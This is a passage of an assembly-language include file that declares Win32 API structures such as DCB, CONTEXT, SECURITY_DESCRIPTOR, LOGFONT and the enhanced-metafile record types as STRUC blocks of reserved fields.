.wPacketiLength RESW 1
.wPacketVersion RESW 1
.dwServiceMask RESD 1
.dwReserved1 RESD 1
.dwMaxTxQueue RESD 1
.dwMaxRxQueue RESD 1
.dwMaxBaud RESD 1
.dwProvSubType RESD 1
.dwProvCapabilities RESD 1
.dwSettableParams RESD 1
.dwSettableBaud RESD 1
.wSettableData RESW 1
.wSettableStopParity RESW 1
.dwCurrentTxQueue RESD 1
.dwCurrentRxQueue RESD 1
.dwProvSpec1 RESD 1
.dwProvSpec2 RESD 1
.wcProvChar RESW 1
ENDSTRUC
STRUC COMSTAT
.fCtsHold RESD 1
.fDsrHold RESD 1
.fRlsdHold RESD 1
.fXoffHold RESD 1
.fXoffSent RESD 1
.fEof RESD 1
.fTxim RESD 1
.fReserved RESD 1
.cbInQue RESD 1
.cbOutQue RESD 1
ENDSTRUC
STRUC DCB
.DCBlength RESD 1
.BaudRate RESD 1
.fbits RESD 1
.wReserved RESW 1
.XonLim RESW 1
.XoffLim RESW 1
.ByteSize RESB 1
.Parity RESB 1
.StopBits RESB 1
.XonChar RESB 1
.XoffChar RESB 1
.ErrorChar RESB 1
.EofChar RESB 1
.EvtChar RESB 1
ENDSTRUC
STRUC COMMTIMEOUTS
.ReadIntervalTimeout RESD 1
.ReadTotalTimeoutMultiplier RESD 1
.ReadTotalTimeoutConstant RESD 1
.WriteTotalTimeoutMultiplier RESD 1
.WriteTotalTimeoutConstant RESD 1
ENDSTRUC
STRUC SYSTEM_INFO
.dwOemID RESD 1
.dwPageSize RESD 1
.lpMinimumApplicationAddress RESD 1
.lpMaximumApplicationAddress RESD 1
.dwActiveProcessorMask RESD 1
.dwNumberOrfProcessors RESD 1
.dwProcessorType RESD 1
.dwAllocationGranularity RESD 1
.wProcessorLevel RESW 1
.wProcessorRevision RESW 1
ENDSTRUC
STRUC MEMORYSTATUS
.dwiLength RESD 1
.dwMemoryLoad RESD 1
.dwTotalPhys RESD 1
.dwAvailPhys RESD 1
.dwTotalPageFile RESD 1
.dwAvailPageFile RESD 1
.dwTotalVirtual RESD 1
.dwAvailVirtual RESD 1
ENDSTRUC
STRUC TPMPARAMS
.cbSize RESD 1
.rcExclude RESB RECT_size
ENDSTRUC
STRUC GENERIC_MAPPING
.GenericRead RESD 1
.GenericWrite RESD 1
.GenericExecute RESD 1
.GenericAll RESD 1
ENDSTRUC
STRUC LUID
.LowPart RESD 1
.HighPart RESD 1
ENDSTRUC
STRUC LUID_AND_ATTRIBUTES
.pLuid RESD 1
.Attributes RESD 1
ENDSTRUC
STRUC ACL
.AclRevision RESB 1
.Sbz1 RESB 1
.AclSize RESW 1
.AceCount RESW 1
.Sbz2 RESW 1
ENDSTRUC
STRUC ACE_HEADER
.AceType RESB 1
.AceFlags RESB 1
.AceSize RESD 1
ENDSTRUC
STRUC ACCESS_ALLOWED_ACE
.Header RESD 1
.imask RESD 1
.SidStart RESD 1
ENDSTRUC
STRUC ACCESS_DENIED_ACE
.Header RESD 1
.imask RESD 1
.SidStart RESD 1
ENDSTRUC
STRUC SYSTEM_AUDIT_ACE
.Header RESD 1
.imask RESD 1
.SidStart RESD 1
ENDSTRUC
STRUC SYSTEM_ALARM_ACE
.Header RESD 1
.imask RESD 1
.SidStart RESD 1
ENDSTRUC
STRUC ACL_REVISION_INFORMATION
.AclRevision RESD 1
ENDSTRUC
STRUC ACL_SIZE_INFORMATION
.AceCount RESD 1
.AclBytesInUse RESD 1
.AclBytesFree RESD 1
ENDSTRUC
STRUC SECURITY_DESCRIPTOR
.Revision RESB 1
.Sbz1 RESB 1
.Control RESD 1
.Owner RESD 1
.lGroup RESD 1
.Sacl RESD 1
.Dacl RESD 1
ENDSTRUC
STRUC PRIVILEGE_SET
.PrivilegeCount RESD 1
.Control RESD 1
.Privilege RESD 1
ENDSTRUC
STRUC EXCEPTION_RECORD
.ExceptionCode RESD 1
.ExceptionFlags RESD 1
.pExceptionRecord RESD 1
.ExceptionAddress RESD 1
.NumberParameters RESD 1
.ExceptionInformation RESD 1
ENDSTRUC
STRUC EXCEPTION_DEBUG_INFO
.pExceptionRecord RESD 1
.dwFirstChance RESD 1
ENDSTRUC
STRUC CREATE_THREAD_DEBUG_INFO
.hThread RESD 1
.lpThreadLocalBase RESD 1
.lpStartAddress RESD 1
ENDSTRUC
STRUC CREATE_PROCESS_DEBUG_INFO
.hFile RESD 1
.hProcess RESD 1
.hThread RESD 1
.lpBaseOfImage RESD 1
.dwDebugInfoFileOffset RESD 1
.nDebugInfoSize RESD 1
.lpThreadLocalBase RESD 1
.lpStartAddress RESD 1
.lpImageName RESD 1
.fUnicode RESD 1
ENDSTRUC
STRUC EXIT_THREAD_DEBUG_INFO
.dwExitCode RESD 1
ENDSTRUC
STRUC EXIT_PROCESS_DEBUG_INFO
.dwExitCode RESD 1
ENDSTRUC
STRUC LOAD_DLL_DEBUG_INFO
.hFile RESD 1
.lpBaseOfDll RESD 1
.dwDebugInfoFileOffset RESD 1
.nDebugInfoSize RESD 1
.lpImageName RESD 1
.fUnicode RESW 1
ENDSTRUC
STRUC UNLOAD_DLL_DEBUG_INFO
.lpBaseOfDll RESD 1
ENDSTRUC
STRUC OUTPUT_DEBUG_STRING_INFO
.lpDebugStringData RESD 1
.fUnicode RESW 1
.nDebugStringiLength RESW 1
ENDSTRUC
STRUC RIP_INFO
.dwError RESD 1
.dwType RESD 1
ENDSTRUC
STRUC OFSTRUCT
.cBytes RESB 1
.fFixedDisk RESB 1
.nErrCode RESW 1
.Reserved1 RESW 1
.Reserved2 RESW 1
.szPathName RESB 1
ENDSTRUC
STRUC WNDCLASSEX
.cbSize RESD 1
.style RESD 1
.lpfnWndProc RESD 1
.cbClsExtra RESD 1
.cbWndExtra RESD 1
.hInstance RESD 1
.hIcon RESD 1
.hCursor RESD 1
.hbrBackground RESD 1
.lpszMenuName RESD 1
.lpszClassName RESD 1
.hIconSm RESD 1
ENDSTRUC
STRUC WNDCLASS
.style RESD 1
.lpfnWndProc RESD 1
.cbClsExtra RESD 1
.cbWndExtra RESD 1
.hInstance RESD 1
.hIcon RESD 1
.hCursor RESD 1
.hbrBackground RESD 1
.lpszMenuName RESD 1
.lpszClassName RESD 1
ENDSTRUC
STRUC CRITICAL_SECTION
.Par1 RESD 1
.Par2 RESD 1
.Par3 RESD 1
.Par4 RESD 1
.Par5 RESD 1
.Par6 RESD 1
ENDSTRUC
STRUC BY_HANDLE_FILE_INFORMATION
.dwFileAttributes RESD 1
.ftCreationTime RESB FILETIME_size
.ftLastAccessTime RESB FILETIME_size
.ftLastWriteTime RESB FILETIME_size
.dwVolumeSerialNumber RESD 1
.nFileSizeHigh RESD 1
.nFileSizeLow RESD 1
.nNumberOfLinks RESD 1
.nFileIndexHigh RESD 1
.nFileIndexLow RESD 1
ENDSTRUC
STRUC MEMORY_BASIC_INFORMATION
.BaseAddress RESD 1
.AllocationBase RESD 1
.AllocationProtect RESD 1
.RegionSize RESD 1
.State RESD 1
.Protect RESD 1
.lType RESD 1
ENDSTRUC
STRUC EVENTLOGRECORD
.iLength RESD 1
.Reserved RESD 1
.RecordNumber RESD 1
.TimeGenerated RESD 1
.TimeWritten RESD 1
.EventID RESD 1
.EventType RESW 1
.NumStrings RESW 1
.EventCategory RESW 1
.ReservedFlags RESW 1
.ClosingRecordNumber RESD 1
.StringOffset RESD 1
.UserSidiLength RESD 1
.UserSidOffset RESD 1
.DataiLength RESD 1
.DataOffset RESD 1
ENDSTRUC
STRUC TOKEN_GROUPS
.GroupCount RESD 1
.Groups RESD 1
ENDSTRUC
STRUC TOKEN_PRIVILEGES
.PrivilegeCount RESD 1
.Privileges RESD 1
ENDSTRUC
STRUC FLOATING_SAVE_AREA
.ControlWord RESD 1
.StatusWord RESD 1
.TagWord RESD 1
.ErrorOffset RESD 1
.ErrorSelector RESD 1
.DataOffset RESD 1
.DataSelector RESD 1
.RegisterArea RESB 1
.Cr0NpxState RESD 1
ENDSTRUC
STRUC CONTEXT
.ContextFlags RESD 1
.iDr0 RESD 1
.iDr1 RESD 1
.iDr2 RESD 1
.iDr3 RESD 1
.iDr6 RESD 1
.iDr7 RESD 1
.FloatSave RESD 1
.regGs RESD 1
.regFs RESD 1
.regEs RESD 1
.regDs RESD 1
.regEdi RESD 1
.regEsi RESD 1
.regEbx RESD 1
.regEdx RESD 1
.regEcx RESD 1
.regEax RESD 1
.regEbp RESD 1
.regEip RESD 1
.regCs RESD 1
.regFlag RESD 1
.regEsp RESD 1
.regSs RESD 1
ENDSTRUC
STRUC EXCEPTION_POINTERS
.pExceptionRecord RESD 1
.ContextRecord RESD 1
ENDSTRUC
STRUC LDT_BYTES
.BaseMid RESB 1
.Flags1 RESB 1
.Flags2 RESB 1
.BaseHi RESB 1
ENDSTRUC
STRUC LDT_ENTRY
.LimitLow RESW 1
.BaseLow RESW 1
.HiWord RESD 1
ENDSTRUC
STRUC TIME_ZONE_INFORMATION
.Bias RESD 1
.StandardName RESW 1
.StandardDate RESD 1
.StandardBias RESD 1
.DaylightName RESW 1
.DaylightDate RESD 1
.DaylightBias RESD 1
ENDSTRUC
STRUC WIN32_STREAM_ID
.dwStreamID RESD 1
.dwStreamAttributes RESD 1
.dwStreamSizeLow RESD 1
.dwStreamSizeHigh RESD 1
.dwStreamNameSize RESD 1
.cStreamName RESB 1
ENDSTRUC
STRUC STARTUPINFO
.cb RESD 1
.lpReserved RESD 1
.lpDesktop RESD 1
.lpTitle RESD 1
.dwX RESD 1
.dwY RESD 1
.dwXSize RESD 1
.dwYSize RESD 1
.dwXCountChars RESD 1
.dwYCountChars RESD 1
.dwFillAttribute RESD 1
.dwFlags RESD 1
.wShowWindow RESW 1
.cbReserved2 RESW 1
.lpReserved2 RESB 1
.hStdInput RESD 1
.hStdOutput RESD 1
.hStdError RESD 1
ENDSTRUC
STRUC WIN32_FIND_DATA
.dwFileAttributes RESD 1
.ftCreationTime RESB FILETIME_size
.ftLastAccessTime RESB FILETIME_size
.ftLastWriteTime RESB FILETIME_size
.nFileSizeHigh RESD 1
.nFileSizeLow RESD 1
.dwReserved0 RESD 1
.dwReserved1 RESD 1
.cFileName RESB MAX_PATH
.cAlternate RESB 14
ENDSTRUC
STRUC CPINFO
.MaxCharSize RESD 1
.DefaultChar RESB 1
.LeadByte RESB 1
ENDSTRUC
STRUC NUMBERFMT
.NumDigits RESD 1
.LeadingZero RESD 1
.Grouping RESD 1
.lpDecimalSep RESD 1
.lpThousandSep RESD 1
.NegativeOrder RESD 1
ENDSTRUC
STRUC CURRENCYFMT
.NumDigits RESD 1
.LeadingZero RESD 1
.Grouping RESD 1
.lpDecimalSep RESD 1
.lpThousandSep RESD 1
.NegativeOrder RESD 1
.PositiveOrder RESD 1
.lpCurrencySymbol RESD 1
ENDSTRUC
STRUC COORD
.x RESW 1
.y RESW 1
ENDSTRUC
STRUC SMALL_RECT
.left RESW 1
.top RESW 1
.right RESW 1
.bottom RESW 1
ENDSTRUC
STRUC KEY_EVENT_RECORD
.bKeyDown RESD 1
.wRepeatCount RESW 1
.wVirtualKeyCode RESW 1
.wVirtualScanCode RESW 1
.uChar RESW 1
.dwControlKeyState RESD 1
ENDSTRUC
STRUC MOUSE_EVENT_RECORD
.dwMousePosition RESD 1
.dwButtonState RESD 1
.dwControlKeyState RESD 1
.dwEventFlags RESD 1
ENDSTRUC
STRUC WINDOW_BUFFER_SIZE_RECORD
.dwSize RESD 1
ENDSTRUC
STRUC MENU_EVENT_RECORD
.dwCommandId RESD 1
ENDSTRUC
STRUC FOCUS_EVENT_RECORD
.bSetFocus RESD 1
ENDSTRUC
STRUC CHAR_INFO
.Char RESW 1
.Attributes RESW 1
ENDSTRUC
STRUC CONSOLE_SCREEN_BUFFER_INFO
.dwSize RESD 1
.dwCursorPosition RESD 1
.wAttributes RESW 1
.srWindow RESB SMALL_RECT_size
.dwMaximumWindowSize RESD 1
ENDSTRUC
STRUC CONSOLE_CURSOR_INFO
.dwSize RESD 1
.bVisible RESD 1
ENDSTRUC
STRUC XFORM
.eM11 RESQ 1
.eM12 RESQ 1
.eM21 RESQ 1
.eM22 RESQ 1
.ex RESQ 1
.ey RESQ 1
ENDSTRUC
STRUC BITMAP
.bmType RESD 1
.bmWidth RESD 1
.bmHeight RESD 1
.bmWidthBytes RESD 1
.bmPlanes RESW 1
.bmBitsPixel RESW 1
.bmBits RESD 1
ENDSTRUC
STRUC RGBTRIPLE
.rgbtBlue RESB 1
.rgbtGreen RESB 1
.rgbtRed RESB 1
ENDSTRUC
STRUC RGBQUAD
.rgbBlue RESB 1
.rgbGreen RESB 1
.rgbRed RESB 1
.rgbReserved RESB 1
ENDSTRUC
STRUC BITMAPCOREHEADER
.bcSize RESD 1
.bcWidth RESW 1
.bcHeight RESW 1
.bcPlanes RESW 1
.bcBitCount RESW 1
ENDSTRUC
STRUC BITMAPINFOHEADER
.biSize RESD 1
.biWidth RESD 1
.biHeight RESD 1
.biPlanes RESW 1
.biBitCount RESW 1
.biCompression RESD 1
.biSizeImage RESD 1
.biXPelsPerMeter RESD 1
.biYPelsPerMeter RESD 1
.biClrUsed RESD 1
.biClrImportant RESD 1
ENDSTRUC
STRUC BITMAPINFO
.bmiHeader RESD 1
.bmiColors RESD 1
ENDSTRUC
STRUC BITMAPCOREINFO
.bmciHeader RESD 1
.bmciColors RESD 1
ENDSTRUC
STRUC BITMAPFILEHEADER
.bfType RESW 1
.bfSize RESD 1
.bfReserved1 RESW 1
.bfReserved2 RESW 1
.bfOffBits RESD 1
ENDSTRUC
STRUC HANDLETABLE
.objectHandle RESD 1
ENDSTRUC
STRUC METARECORD
.rdSize RESD 1
.rdFunction RESW 1
.rdParm1 RESW 1
ENDSTRUC
STRUC METAFILEPICT
.imm RESD 1
.xExt RESD 1
.yExt RESD 1
.hMF RESD 1
ENDSTRUC
STRUC METAHEADER
.mtType RESW 1
.mtHeaderSize RESW 1
.mtVersion RESW 1
.mtSize RESD 1
.mtNoObjects RESW 1
.mtMaxRecord RESD 1
.mtNoParameters RESW 1
ENDSTRUC
STRUC ENHMETARECORD
.iType RESD 1
.nSize RESD 1
.dParm1 RESD 1
ENDSTRUC
STRUC ENHMETAHEADER
.iType RESD 1
.nSize RESD 1
.rclBounds RESB RECT_size
.rclFrame RESB RECT_size
.dSignature RESD 1
.nVersion RESD 1
.nBytes RESD 1
.nRecords RESD 1
.nHandles RESW 1
.sReserved RESW 1
.nDescription RESD 1
.offDescription RESD 1
.nPalEntries RESD 1
.szlDevice RESD 1
.szlMillimeters RESD 1
ENDSTRUC
STRUC TEXTMETRIC
.tmHeight RESD 1
.tmAscent RESD 1
.tmDescent RESD 1
.tmInternalLeading RESD 1
.tmExternalLeading RESD 1
.tmAveCharWidth RESD 1
.tmMaxCharWidth RESD 1
.tmWeight RESD 1
.tmOverhang RESD 1
.tmDigitizedAspectX RESD 1
.tmDigitizedAspectY RESD 1
.tmFirstChar RESB 1
.tmLastChar RESB 1
.tmDefaultChar RESB 1
.tmBreakChar RESB 1
.tmItalic RESB 1
.tmUnderlined RESB 1
.tmStruckOut RESB 1
.tmPitchAndFamily RESB 1
.tmCharSet RESB 1
ENDSTRUC
STRUC NEWTEXTMETRIC
.tmHeight RESD 1
.tmAscent RESD 1
.tmDescent RESD 1
.tmInternalLeading RESD 1
.tmExternalLeading RESD 1
.tmAveCharWidth RESD 1
.tmMaxCharWidth RESD 1
.tmWeight RESD 1
.tmOverhang RESD 1
.tmDigitizedAspectX RESD 1
.tmDigitizedAspectY RESD 1
.tmFirstChar RESB 1
.tmLastChar RESB 1
.tmDefaultChar RESB 1
.tmBreakChar RESB 1
.tmItalic RESB 1
.tmUnderlined RESB 1
.tmStruckOut RESB 1
.tmPitchAndFamily RESB 1
.tmCharSet RESB 1
.ntmFlags RESD 1
.ntmSizeEM RESD 1
.ntmCellHeight RESD 1
.ntmAveWidth RESD 1
ENDSTRUC
STRUC PELARRAY
.paXCount RESD 1
.paYCount RESD 1
.paXExt RESD 1
.paYExt RESD 1
.paRGBs RESW 1
ENDSTRUC
STRUC LOGBRUSH
.lbStyle RESD 1
.lbColor RESD 1
.lbHatch RESD 1
ENDSTRUC
STRUC LOGPEN
.lopnStyle RESD 1
.lopnWidth RESD 1
.lopnColor RESD 1
ENDSTRUC
STRUC EXTLOGPEN
.elpPenStyle RESD 1
.elpWidth RESD 1
.elpBrushStyle RESD 1
.elpColor RESD 1
.elpHatch RESD 1
.elpNumEntries RESD 1
.elpStyleEntry RESD 1
ENDSTRUC
STRUC PALETTEENTRY
.peRed RESB 1
.peGreen RESB 1
.peBlue RESB 1
.peFlags RESB 1
ENDSTRUC
STRUC LOGPALETTE
.palVersion RESW 1
.palNumEntries RESW 1
.palPalEntry RESD 1
ENDSTRUC
STRUC LOGFONT
.lfHeight RESD 1
.lfWidth RESD 1
.lfEscapement RESD 1
.lfOrientation RESD 1
.lfWeight RESD 1
.lfItalic RESB 1
.lfUnderline RESB 1
.lfStrikeOut RESB 1
.lfCharSet RESB 1
.lfOutPrecision RESB 1
.lfClipPrecision RESB 1
.lfQuality RESB 1
.lfPitchAndFamily RESB 1
.lfFaceName RESB LF_FACESIZE
ENDSTRUC
STRUC NONCLIENTMETRICS
.cbSize RESD 1
.iBorderWidth RESD 1
.iScrollWidth RESD 1
.iScrollHeight RESD 1
.iCaptionWidth RESD 1
.iCaptionHeight RESD 1
.lfCaptionFont RESD 1
.iSMCaptionWidth RESD 1
.iSMCaptionHeight RESD 1
.lfSMCaptionFont RESD 1
.iMenuWidth RESD 1
.iMenuHeight RESD 1
.lfMenuFont RESD 1
.lfStatusFont RESD 1
.lfMessageFont RESD 1
ENDSTRUC
STRUC ENUMLOGFONT
.elfLogFont RESD 1
.elfFullName RESB 1
.elfStyle RESB 1
ENDSTRUC
STRUC PANOSE
.ulculture RESD 1
.bFamilyType RESB 1
.bSerifStyle RESB 1
.bWeight RESB 1
.bProportion RESB 1
.bContrast RESB 1
.bStrokeVariation RESB 1
.bArmStyle RESB 1
.bLetterform RESB 1
.bMidline RESB 1
.bXHeight RESB 1
ENDSTRUC
STRUC EXTLOGFONT
.elfLogFont RESD 1
.elfFullName RESB 1
.elfStyle RESB 1
.elfVersion RESD 1
.elfStyleSize RESD 1
.elfMatch RESD 1
.elfReserved RESD 1
.elfVendorId RESB 1
.elfCulture RESD 1
.elfPanose RESD 1
ENDSTRUC
STRUC DEVMODE
.dmDeviceName RESB 1
.dmSpecVersion RESW 1
.dmDriverVersion RESW 1
.dmSize RESW 1
.dmDriverExtra RESW 1
.dmFields RESD 1
.dmOrientation RESW 1
.dmPaperSize RESW 1
.dmPaperiLength RESW 1
.dmPaperWidth RESW 1
.dmScale RESW 1
.dmCopies RESW 1
.dmDefaultSource RESW 1
.dmPrintQuality RESW 1
.dmColor RESW 1
.dmDuplex RESW 1
.dmYResolution RESW 1
.dmTTOption RESW 1
.dmCollate RESW 1
.dmFormName RESB CCHFORMNAME
.dmUnusedPadding RESW 1
.dmBitsPerPel RESW 1
.dmPelsWidth RESD 1
.dmPelsHeight RESD 1
.dmDisplayFlags RESD 1
.dmDisplayFrequency RESD 1
ENDSTRUC
STRUC RGNDATAHEADER
.dwSize RESD 1
.iType RESD 1
.nCount RESD 1
.nRgnSize RESD 1
.rcBound RESB RECT_size
ENDSTRUC
STRUC RGNDATA
.rdh RESD 1
.Buffer RESB 1
ENDSTRUC
STRUC ABC
.abcA RESD 1
.abcB RESD 1
.abcC RESD 1
ENDSTRUC
STRUC ABCFLOAT
.abcfA RESQ 1
.abcfB RESQ 1
.abcfC RESQ 1
ENDSTRUC
STRUC OUTLINETEXTMETRIC
.otmSize RESD 1
.otmTextMetrics RESD 1
.otmFiller RESB 1
.otmPanoseNumber RESD 1
.otmfsSelection RESD 1
.otmfsType RESD 1
.otmsCharSlopeRise RESD 1
.otmsCharSlopeRun RESD 1
.otmItalicAngle RESD 1
.otmEMSquare RESD 1
.otmAscent RESD 1
.otmDescent RESD 1
.otmLineGap RESD 1
.otmsCapEmHeight RESD 1
.otmsXHeight RESD 1
.otmrcFontBox RESB RECT_size
.otmMacAscent RESD 1
.otmMacDescent RESD 1
.otmMacLineGap RESD 1
.otmusMinimumPPEM RESD 1
.otmptSubscriptSize RESD 1
.otmptSubscriptOffset RESD 1
.otmptSuperscriptSize RESD 1
.otmptSuperscriptOffset RESD 1
.otmsStrikeoutSize RESD 1
.otmsStrikeoutPosition RESD 1
.otmsUnderscorePosition RESD 1
.otmsUnderscoreSize RESD 1
.otmpFamilyName RESD 1
.otmpFaceName RESD 1
.otmpStyleName RESD 1
.otmpFullName RESD 1
ENDSTRUC
STRUC POLYTEXT
.x RESD 1
.y RESD 1
.n RESD 1
.lpStr RESD 1
.uiFlags RESD 1
.rcl RESB RECT_size
.pdx RESD 1
ENDSTRUC
STRUC FIXED
.fract RESW 1
.Value RESW 1
ENDSTRUC
STRUC MAT2
.eM11 RESD 1
.eM12 RESD 1
.eM21 RESD 1
.eM22 RESD 1
ENDSTRUC
STRUC GLYPHMETRICS
.gmBlackBoxX RESD 1
.gmBlackBoxY RESD 1
.gmptGlyphOrigin RESD 1
.gmCellIncX RESW 1
.gmCellIncY RESW 1
ENDSTRUC
STRUC POINTFX
.x RESD 1
.y RESD 1
ENDSTRUC
STRUC TTPOLYCURVE
.wType RESW 1
.cpfx RESW 1
.apfx RESD 1
ENDSTRUC
STRUC TTPOLYGONHEADER
.cb RESD 1
.dwType RESD 1
.pfxStart RESD 1
ENDSTRUC
STRUC RASTERIZER_STATUS
.nSize RESW 1
.wFlags RESW 1
.nLanguageID RESW 1
ENDSTRUC
STRUC COLORADJUSTMENT
.caSize RESW 1
.caFlags RESW 1
.caIlluminantIndex RESW 1
.caRedGamma RESW 1
.caGreenGamma RESW 1
.caBlueGamma RESW 1
.caReferenceBlack RESW 1
.caReferenceWhite RESW 1
.caContrast RESW 1
.caBrightness RESW 1
.caColorfulness RESW 1
.caRedGreenTint RESW 1
ENDSTRUC
STRUC DOCINFO
.cbSize RESD 1
.lpszDocName RESD 1
.lpszOutput RESD 1
ENDSTRUC
STRUC KERNINGPAIR
.wFirst RESW 1
.wSecond RESW 1
.iKernAmount RESD 1
ENDSTRUC
STRUC emr
.iType RESD 1
.nSize RESD 1
ENDSTRUC
STRUC emrtext
.ptlReference RESB POINT_size
.nchars RESD 1
.offString RESD 1
.fOptions RESD 1
.ircl RESD 1
.offDx RESD 1
ENDSTRUC
STRUC EMR
.iType RESD 1
.nSize RESD 1
ENDSTRUC
STRUC EMRABORTPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRBEGINPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRENDPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRCLOSEFIGURE
.emr RESB EMR_size
ENDSTRUC
STRUC EMRFLATTENPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRWIDENPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRSETMETARGN
.emr RESB EMR_size
ENDSTRUC
STRUC EMREMRSAVEDC
.emr RESB EMR_size
ENDSTRUC
STRUC EMRREALIZEPALETTE
.emr RESB EMR_size
ENDSTRUC
STRUC EMRSELECTCLIPPATH
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETBKMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETMAPMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETPOLYFILLMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETROP2
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETSTRETCHBLTMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETTEXTALIGN
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETMITERLIMIT
.emr RESB EMR_size
.eMiterLimit RESQ 1
ENDSTRUC
STRUC EMRRESTOREDC
.emr RESB EMR_size
.iRelative RESD 1
ENDSTRUC
STRUC EMRSETARCDIRECTION
.emr RESB EMR_size
.iArcDirection RESD 1
ENDSTRUC
STRUC EMRSETMAPPERFLAGS
.emr RESB EMR_size
.dwFlags RESD 1
ENDSTRUC
STRUC EMRSETTEXTCOLOR
.emr RESB EMR_size
.crColor RESD 1
ENDSTRUC
STRUC EMRSETBKCOLOR
.emr RESB EMR_size
.crColor RESD 1
ENDSTRUC
STRUC EMRSELECTOBJECT
.emr RESB EMR_size
.ihObject RESD 1
ENDSTRUC
STRUC EMRDELETEOBJECT
.emr RESB EMR_size
.ihObject RESD 1
ENDSTRUC
STRUC EMRSELECTPALETTE
.emr RESB EMR_size
.ihPal RESD 1
ENDSTRUC
STRUC EMRRESIZEPALETTE
.emr RESB EMR_size
.ihPal RESD 1
.cEntries RESD 1
ENDSTRUC
STRUC EMRSETPALETTEENTRIES
.emr RESB EMR_size
.ihPal RESD 1
.iStart RESD 1
.cEntries RESD 1
.aPalEntries RESD 1
ENDSTRUC
STRUC EMRSETCOLORADJUSTMENT
.emr RESB EMR_size
.ColorAdjustment RESD 1
ENDSTRUC
STRUC EMRGDICOMMENT
.emr RESB EMR_size
.cbData RESD 1
.xData1 RESW 1
ENDSTRUC
STRUC EMREOF
.emr RESB EMR_size
.nPalEntries RESD 1
.offPalEntries RESD 1
.nSizeLast RESD 1
ENDSTRUC
STRUC EMRLINETO
.emr RESB EMR_size
.ptl RESB POINT_size
ENDSTRUC
STRUC EMRMOVETOEX
.emr RESB EMR_size
.ptl RESB POINT_size
ENDSTRUC
STRUC EMROFFSETCLIPRGN
.emr RESB EMR_size
.ptlOffset RESB POINT_size
ENDSTRUC
STRUC EMRFILLPATH
.emr RESB EMR_size
.rclBounds RESB RECT_size
ENDSTRUC
STRUC EMRSTROKEANDFILLPATH
.emr RESB EMR_size
.rclBounds RESB RECT_size
ENDSTRUC
STRUC EMRSTROKEPATH
.emr RESB EMR_size
.rclBounds RESB RECT_size
ENDSTRUC
STRUC EMREXCLUDECLIPRECT
.emr RESB EMR_size
.rclClip RESB RECT_size
ENDSTRUC
STRUC EMRINTERSECTCLIPRECT
.emr RESB EMR_size
.rclClip RESB RECT_size
ENDSTRUC
STRUC EMRSETVIEWPORTORGEX
.emr RESB EMR_size
.ptlOrigin RESB POINT_size
ENDSTRUC
STRUC EMRSETWINDOWORGEX
.emr RESB EMR_size
.ptlOrigin RESB POINT_size
ENDSTRUC
STRUC EMRSETBRUSHORGEX
.emr RESB EMR_size
.ptlOrigin RESB POINT_size
ENDSTRUC
STRUC EMRSETVIEWPORTEXTEX
.emr RESB EMR_size
.szlExtent RESD 1
ENDSTRUC
STRUC EMRSETWINDOWEXTEX
.emr RESB EMR_size
.szlExtent RESD 1
ENDSTRUC
STRUC EMRSCALEVIEWPORTEXTEX
.emr RESB EMR_size
.xNum RESD 1
.xDenom RESD 1
.yNum RESD 1
.yDemon RESD 1
ENDSTRUC
STRUC EMRSCALEWINDOWEXTEX
.emr RESB EMR_size
.xNum RESD 1
.xDenom RESD 1
.yNum RESD 1
.yDemon RESD 1
ENDSTRUC
STRUC EMRSETWORLDTRANSFORM
.emr RESB EMR_size
.xform RESD 1
ENDSTRUC
STRUC EMRMODIFYWORLDTRANSFORM
.emr RESB EMR_size
.xform RESD 1
.iMode RESD 1
ENDSTRUC
STRUC EMRSETPIXELV
.emr RESB EMR_size
.ptlPixel RESB POINT_size
.crColor RESD 1
ENDSTRUC
STRUC EMREXTFLOODFILL
.emr RESB EMR_size
.ptlStart RESB POINT_size
.crColor RESD 1
.iMode RESD 1
ENDSTRUC
STRUC EMRELLIPSE
.emr RESB EMR_size
.rclBox RESB RECT_size
ENDSTRUC
STRUC EMRRECTANGLE
.emr RESB EMR_size
.rclBox RESB RECT_size
ENDSTRUC
STRUC EMRROUNDRECT
.emr RESB EMR_size
.rclBox RESB RECT_size
.szlCorner RESD 1
ENDSTRUC
STRUC EMRARC
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRARCTO
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRCHORD
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRPIE
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRANGLEARC
.emr RESB EMR_size
.ptlCenter RESB POINT_size
.nRadius RESD 1
.eStartAngle RESQ 1
.eSweepAngle RESQ 1
ENDSTRUC
STRUC EMRPOLYLINE
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYBEZIER
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYGON
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYBEZIERTO
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYLINE16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYBEZIER16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYGON16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
